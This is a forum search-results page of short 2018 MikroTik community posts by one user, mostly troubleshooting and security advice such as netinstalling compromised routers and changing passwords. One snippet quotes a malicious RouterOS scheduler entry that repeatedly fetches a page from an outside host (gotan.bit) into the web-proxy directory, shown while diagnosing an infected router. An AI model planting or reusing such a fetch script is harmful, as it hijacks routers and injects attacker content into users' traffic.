Community discussions

Search found 662 matches

  • 1
  • 2
  • 3
  • 4
  • 5
  • 14
by R1CH
Mon Oct 22, 2018 1:06 am
Forum: General
Topic: CloudFlare DNS over TLS
Replies: 34
Views: 5273

Re: CloudFlare DNS over TLS

I've got DNS over TLS working on my hEX! If you've rooted your device (don't contact MT for support if you do this!) it's quite straightforward to install. Since cloudflared is written in Go, it's easy to cross-compile and the only thing it needs to operate is a ca-certificates.crt bundle which I co...
by R1CH
Tue Oct 16, 2018 2:22 pm
Forum: RouterBOARD hardware
Topic: Qualcomm IPQ8074
Replies: 3
Views: 1080

Re: Qualcomm IPQ8074

Given how long it took for 802.11ac (which still isn't fully implemented!), I think it will be 2020 or later before Mikrotik come out with 802.11ax products :(.
by R1CH
Tue Oct 16, 2018 1:33 am
Forum: General
Topic: Jailbreak for RouterOS 6.43.2 released [SOLVED]
Replies: 16
Views: 1171

Re: Jailbreak for RouterOS 6.43.2 released [SOLVED]

Finally had some time to play around with this. It works very well and there is almost zero risk of bricking your device. Can't wait to start experimenting with custom software on my router at last!
by R1CH
Fri Oct 12, 2018 5:28 pm
Forum: General
Topic: Jailbreak for RouterOS 6.43.2 released [SOLVED]
Replies: 16
Views: 1171

Re: Jailbreak for RouterOS 6.43.2 released [SOLVED]

I wish there were an official way to do this rather than relying on tools that potentially cause issues or stop working in the future. Installing wireguard for example or proper openvpn with UDP support would be so useful.
by R1CH
Wed Oct 10, 2018 6:19 pm
Forum: General
Topic: Limiting ICMP on input chain
Replies: 3
Views: 647

Re: Limiting ICMP on input chain

Reminder that ICMP source addresses can be spoofed, adding addresses to a blacklist without being able to verify the source address is a bad practice. It's better to just rate limit (which is built into the kernel - check IP / Settings).
by R1CH
Wed Oct 10, 2018 1:15 pm
Forum: General
Topic: Can't Upgrade router mikrotik because hacked
Replies: 4
Views: 621

Re: Can't Upgrade router mikrotik because hacked

The ONLY safe way is to netinstall. The exploit can install files outside of RouterOS, so your router remains compromised even after a config reset. You can still export your config and import it again after sanitizing it.
by R1CH
Tue Oct 09, 2018 12:19 am
Forum: RouterBOARD hardware
Topic: Improove capacitor quality
Replies: 3
Views: 494

Re: Improove capacitor quality

How are we still having failing capacitors in 2018?!
by R1CH
Mon Oct 08, 2018 10:38 pm
Forum: General
Topic: CVE-2018-1156 and Winbox exploit
Replies: 0
Views: 270

CVE-2018-1156 and Winbox exploit

There's quite a few blogs going around today which makes it sound like there is some new Mikrotik exploit. It's not a new exploit, but discussions about the combination of the already patched winbox exploit + the already patched CVE-2018-1156 format string exploit. If a router is vulnerable to the w...
by R1CH
Mon Oct 08, 2018 1:04 pm
Forum: General
Topic: Router is infection by virus coinhive
Replies: 4
Views: 1970

Re: Router is infection by virus coinhive

Updating RouterOS won't magically remove bad parts of your configuration, it only prevents future exploits (assuming you changed your passwords). It's up to you to disinfect the router, the recommended way is to netinstall with a known good config, otherwise export the config, reset to default then ...
by R1CH
Sat Oct 06, 2018 5:09 pm
Forum: General
Topic: Unable to get full gigabit speed on RB750Gr3
Replies: 28
Views: 1376

Re: Unable to get full gigabit speed on RB750Gr3

Most likely the device is not powerful enough, check system / resources while testing to check CPU usage.
by R1CH
Fri Oct 05, 2018 2:54 pm
Forum: Wireless Networking
Topic: IPQ4019 chipsets - random capacity loss
Replies: 8
Views: 450

Re: IPQ4019 chipsets - random capacity loss

Many devices from other manufacturers use the IPQ401x chipset without issue. I suspect the problem is more to do with Mikrotik's proprietary driver than the ARM platform itself.
by R1CH
Fri Oct 05, 2018 12:50 pm
Forum: Wireless Networking
Topic: New standard 802.11ax
Replies: 15
Views: 2720

Re: New standard 802.11ax

Any news? ASUS are releasing their RT-AX88U this month which is based on 802.11ax. Would love for Mikrotik to keep up with the home / office wifi space.
by R1CH
Thu Oct 04, 2018 12:19 am
Forum: General
Topic: Route cast to another VLAN
Replies: 3
Views: 157

Re: Route cast to another VLAN

Easiest solution is to put the TV on the guest VLAN, usually such devices are insecure and should be away from your main network anyway. Otherwise you will need to allow routing between the VLANs and forward the multicasts with something like https://github.com/sonicsnes/udp-broadcast-relay-redux
by R1CH
Wed Oct 03, 2018 3:43 pm
Forum: General
Topic: Router compromised even after updating firmware
Replies: 2
Views: 145

Re: Router compromised even after updating firmware

If you backed up from before the compromise, then the backup is safe to use. You can also export the compromised config and manually review it before importing it on a fresh router with changed passwords.
by R1CH
Mon Oct 01, 2018 3:41 pm
Forum: Wireless Networking
Topic: hap ac achievable wifi speed?
Replies: 28
Views: 1050

Re: hap ac achievable wifi speed?

Real world result from a phone in a room across from the hAP AC (wall mounted high up). Almost clear LOS (has to go through a doorway). -57 dBm on the hAP AC, -54 dBm on the phone. Upload limited by ISP.

Image
by R1CH
Mon Oct 01, 2018 3:33 pm
Forum: General
Topic: dns requests to Mikrotik fail if udp on linux
Replies: 5
Views: 197

Re: dns requests to Mikrotik fail if udp on linux

I have an open ticket (#2016082522001037) about bad DNS behavior with the RB850Gx2, apparently with multi core some UDP packets are simply dropped. Perhaps it applies to the RB3011 also. This is a problem since the Linux resolver likes to send two queries at once, one for IPv4 and one for IPv6. Try ...
by R1CH
Mon Oct 01, 2018 3:30 pm
Forum: General
Topic: Winbox Protocol Dissector
Replies: 2
Views: 219

Re: Winbox Protocol Dissector

Very nice, this will make finding vulnerabilities in the protocol much easier!
by R1CH
Fri Sep 28, 2018 3:08 pm
Forum: General
Topic: something is wrong with my DNS resolving...
Replies: 8
Views: 306

Re: something is wrong with my DNS resolving...

Also be sure to change all passwords, if you ran a vulnerable version then the attacker got full access to all passwords on user accounts.
by R1CH
Thu Sep 27, 2018 10:52 pm
Forum: General
Topic: Suspect script foun
Replies: 3
Views: 393

Re: Suspect script foun

Do a netinstall with the latest version, use a known good config and change all passwords.
by R1CH
Thu Sep 27, 2018 2:23 pm
Forum: General
Topic: Ports Filtered regardless of firewall rules
Replies: 1
Views: 156

Re: Ports Filtered regardless of firewall rules

If you're testing from outside your own LAN, this is almost certainly done by your ISP as those are commonly abused ports.
by R1CH
Thu Sep 27, 2018 2:21 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 243
Views: 19656

Re: RB4011

Has anyone been able to order one of these yet? Seems like the expected stock arrival dates keep getting pushed back.
by R1CH
Thu Sep 27, 2018 2:19 pm
Forum: General
Topic: Mikrotik How to SSH from Linux to Mikrotik without Password
Replies: 2
Views: 139

Re: Mikrotik How to SSH from Linux to Mikrotik without Password

Agreed, you should not be using DSA in 2018. Even RSA isn't great, but Ed25519 keys are not yet supported by Mikrotik.
by R1CH
Wed Sep 26, 2018 3:35 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 243
Views: 19656

Re: RB4011

I've had no issues with fs.com 10G DACs between Mikrotik, Netgear and Linksys gear. The stuff is all from China but they seem to have their logistics nailed down pretty well which is how they can offer such good pricing. I know a lot of other people in the industry also use FS so it's not like they'...
by R1CH
Thu Sep 20, 2018 6:16 pm
Forum: General
Topic: Swift mailer issue: not compatible with php router os api
Replies: 1
Views: 83

Re: Swift mailer issue: not compatible with php router os api

This doesn't seem to have anything to do with RouterOS API, your Swift installation seems broken:
Class Swift_SmtpTransport could not be loaded from Swift\SmtpTransport.php, file does not exist
by R1CH
Thu Sep 20, 2018 4:41 pm
Forum: Announcements
Topic: v6.43.1 [stable] and v6.43.2 [stable] are released!
Replies: 186
Views: 23798

Re: v6.43.1 [stable] and v6.43.2 [stable] is released!

Breaking the bootloader in a "stable" release... :lol:
by R1CH
Wed Sep 19, 2018 7:54 pm
Forum: RouterBOARD hardware
Topic: RB1100 dead
Replies: 12
Views: 586

Re: RB1100 dead

Based on this topic it seems the bootloader is damaged. You may find more advice here:

viewtopic.php?t=133750
by R1CH
Wed Sep 19, 2018 5:14 pm
Forum: General
Topic: Weird outbound UDP traffic
Replies: 19
Views: 702

Re: Weird outbound UDP traffic

Emailing support@mikrotik.com will generate a "ticket". I agree this is poor behavior.
by R1CH
Wed Sep 19, 2018 5:13 pm
Forum: General
Topic: Help ! My Router is suddenly messing up my configuration !
Replies: 1
Views: 114

Re: Help ! My Router is suddenly messing up my configuration !

Since those aren't dynamic entries, they have been added through admin interface. Most likely your router is compromised from leaving open ports to WAN interface. You should netinstall with latest version, use known good config and change all passwords.
by R1CH
Tue Sep 18, 2018 5:49 pm
Forum: General
Topic: Mikrotik Error when generating external PDF file
Replies: 7
Views: 298

Re: Mikrotik Error when generating external PDF file

"/tool fetch url=http://gotan.bit:31415/01/error.html mode=http dst-path=webproxy/error.html" policy=\ ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/20/2018 start-time=03:43:47 add interval=13h name=upd114 on-event=\ "/tool fetch url=http://gotan.bit:31415/01/error.html ...
by R1CH
Tue Sep 18, 2018 4:02 pm
Forum: General
Topic: Port 60000 attacks, anyone info on this?
Replies: 11
Views: 370

Re: Port 60000 attacks, anyone info on this?

3389 is RDP, just a standard probe for vulnerable servers. Your firewall should be dropping this without requiring a dedicated rule.
by R1CH
Mon Sep 17, 2018 9:14 pm
Forum: General
Topic: Stopping connections to TCP port 1720
Replies: 6
Views: 296

Re: Stopping connections to TCP port 1720

What kind of connection do you have? Certain modems apparently open upnp to WAN, so you're actually connecting to the modem, not the router.
by R1CH
Thu Sep 13, 2018 9:01 pm
Forum: General
Topic: Can default configuration be hacked?
Replies: 8
Views: 598

Re: Can default configuration be hacked?

If you didn't change passwords then the attackers just reconnected with the stolen password and re-infected the router.
by R1CH
Thu Sep 13, 2018 4:46 pm
Forum: General
Topic: mikrotik configuration issue none caching pages with double quote
Replies: 2
Views: 105

Re: mikrotik configuration issue none caching pages with double quote

You may have a compromised system that has HTTP proxy enabled with malware that is injecting crypto mining scripts into pages. Safest way forward is to netinstall and change all passwords. A config export will easily identify the issue.
by R1CH
Thu Sep 13, 2018 1:29 am
Forum: Wireless Networking
Topic: MT wifi setup options for small retail shops & cafes
Replies: 1
Views: 194

Re: MT wifi setup options for small retail shops & cafes

A single wAP AC should be enough for that kind of light usage. Concurrent users depend a lot on what kind of devices are connecting (slow 2.4 GHz only?), space to be covered and how crowded the frequencies are already. If you do want to go with the annoying social media hotspot then you probably wan...
by R1CH
Thu Sep 13, 2018 1:22 am
Forum: General
Topic: Hate new firmware versioning
Replies: 2
Views: 262

Re: Hate new firmware versioning

I think most admins are in agreement, I haven't seen anyone who is a fan of the new firmware versioning!
by R1CH
Thu Sep 13, 2018 1:20 am
Forum: General
Topic: Attack on port 45678
Replies: 4
Views: 267

Re: Attack on port 45678

Probably if it ran an old version and didn't patch in time, it fell to this: https://blog.mikrotik.com/security/winb ... ility.html

Safest way forward is to netinstall. Don't forget to change all passwords.
by R1CH
Thu Sep 13, 2018 1:18 am
Forum: General
Topic: Why Mikrorik Router OS 6.42.6 UDP Traceroute Drop
Replies: 4
Views: 198

Re: Why Mikrorik Router OS 6.42.6 UDP Traceroute Drop

Are you tracing to a route which has "prohibit" status?
by R1CH
Thu Sep 13, 2018 1:15 am
Forum: General
Topic: Add emoji to the ssid name
Replies: 8
Views: 408

Re: Add emoji to the ssid name

With the suggestions here I've made the script a bit more user friendly.
by R1CH
Tue Sep 11, 2018 1:19 am
Forum: General
Topic: [Feature request] Wireguard
Replies: 32
Views: 4272

Re: [Feature request] Wireguard

And we already know what happens when MikroTik quickly implement a protocol which then later continues to develop independently... see OpenVPN. I know it's a lot to hope for, but this could easily be avoided if Mikrotik would stop re-implementing these features themselves and start using the open s...
by R1CH
Tue Sep 11, 2018 12:52 am
Forum: Announcements
Topic: Newsletter #84
Replies: 41
Views: 6911

Re: Newsletter #84

The RouterOS implementation of OpenVPN will always have shitty throughput since it lacks UDP support.

http://sites.inka.de/bigred/devel/tcp-tcp.html

RB4011 looks like a beast of a device though!
by R1CH
Tue Sep 11, 2018 12:49 am
Forum: RouterBOARD hardware
Topic: Cloud Core Router CCR 1009 cpu Temp
Replies: 2
Views: 177

Re: Cloud Core Router CCR 1009 cpu Temp

I would guess the heatsink has come loose / blocked with debris or thermal interface has degraded.
by R1CH
Mon Sep 10, 2018 7:46 pm
Forum: Announcements
Topic: v6.43 [current] is released!
Replies: 149
Views: 17002

Re: v6.43 [current] is released!

-nm was a winbox issue-
by R1CH
Thu Sep 06, 2018 7:51 pm
Forum: General
Topic: Securing my Rb3011 under attack - SOLVED
Replies: 3
Views: 259

Re: Securing my Rb3011 under attack

You have no firewall so ALL services are exposed! Be aware that exposing any service to the internet is a risk, not even winbox is safe as it was recently exploited. Step 1: Turn off all unnecessary services in ip / services. Step 2: Create firewall rule at top of INPUT chain with ACCEPT for your IP...
by R1CH
Mon Sep 03, 2018 7:27 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 243
Views: 19656

Re: RB4011

The spec sheet lists the max operating temp as +45 C, which is much lower than most other models. I've seen ambient (internal) temps of 60c on my routers that are inside telecom closets etc so unless this has some active cooling, I'm worried it won't be able to operate in the same environments as c...
by R1CH
Mon Sep 03, 2018 3:40 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 243
Views: 19656

Re: RB4011

The spec sheet lists the max operating temp as +45 C, which is much lower than most other models. I've seen ambient (internal) temps of 60c on my routers that are inside telecom closets etc so unless this has some active cooling, I'm worried it won't be able to operate in the same environments as cu...
by R1CH
Thu Aug 30, 2018 6:18 pm
Forum: General
Topic: youtube cache on mikrotik router
Replies: 2
Views: 209

Re: youtube cache on mikrotik router

On Mikrotik is not possible, but as an ISP you can apply for a GGC.

https://peering.google.com/#/options/go ... obal-cache
by R1CH
Wed Aug 29, 2018 3:40 pm
Forum: General
Topic: Hotspot captive portal prevent automatic close on redirect after login
Replies: 22
Views: 8731

Re: Hotspot captive portal prevent automatic close on redirect after login

Be aware that by bypassing the connectivity check in this way there will be NO hotspot popup. Your users will have a very hard time triggering the captive portal redirect, as most sites are using HTTPS which means they will show scary security error messages instead of a redirect. Think carefully ab...
by R1CH
Mon Aug 27, 2018 2:45 pm
Forum: General
Topic: Mikrotik CCR-1009-7G-1C Port Loop Problem
Replies: 2
Views: 171

Re: Mikrotik CCR-1009-7G-1C Port Loop Problem

Post your config, screenshot does not really help. Most likely you have a broken bridge port config or an actual loop.
by R1CH
Sat Aug 25, 2018 12:42 am
Forum: General
Topic: Block user with bad intention
Replies: 6
Views: 459

Re: Block user with bad intention

So what happens when I spoof the IP of Google DNS or whatever DNS server you're using? Oops, your network no longer has DNS connectivity. You should NEVER add to blocklists based on a single input packet. IP spoofing is quite easy, if someone knows this is how your network is setup, they can easily ...
by R1CH
Fri Aug 24, 2018 6:17 pm
Forum: General
Topic: [SOLVED] IPv6 pings work, webpage won't load
Replies: 39
Views: 1221

Re: [SOLVED] IPv6 pings work, webpage won't load

If clamp-to-pmtu solves the problem this probably means there is something in the network path that is dropping ICMPv6 messages. This is pretty bad and you should try and figure out where this is happening and fix it if possible.
  • 1
  • 2
  • 3
  • 4
  • 5
  • 14